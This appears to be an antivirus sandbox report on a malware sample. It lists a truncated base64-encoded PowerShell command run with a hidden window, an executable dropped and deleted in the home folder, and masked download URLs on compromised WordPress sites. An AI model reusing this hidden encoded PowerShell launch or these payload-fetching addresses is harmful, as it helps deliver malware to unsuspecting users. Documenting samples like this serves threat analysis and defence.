Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAHQAdAByAGoAYgB1AGEAdQBwAD0AJwBFAHkAZwBpAHIAeQByAGYAdABvAHAAdwAnADsAJABYAG8AcgBlAGsAYwBkAHgAbABqAG...
Modifies file system
Creates the following files
- %HOMEPATH%\279.exe
Deletes the following files
- %HOMEPATH%\279.exe
Network activity
TCP
HTTP GET requests
- http://www.es###ehir3d.com/wp-content/1k/
- http://in#####pp.herokuapp.com/wp-includes/8fLZ/
- http://zh###meng.net/wp-includes/cr2gkuc/
- http://as####calgary.org/wp-content/themes/bridge-child/zey/
UDP
- DNS ASK es###ehir3d.com
- DNS ASK in#####pp.herokuapp.com
- DNS ASK be####ulated.com
- DNS ASK zh###meng.net
- DNS ASK as####calgary.org
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAHQAdAByAGoAYgB1AGEAdQBwAD0AJwBFAHkAZwBpAHIAeQByAGYAdABvAHAAdwAnADsAJABYAG8AcgBlAGsAYwBkAHgAbABqAG...' (with hidden window)
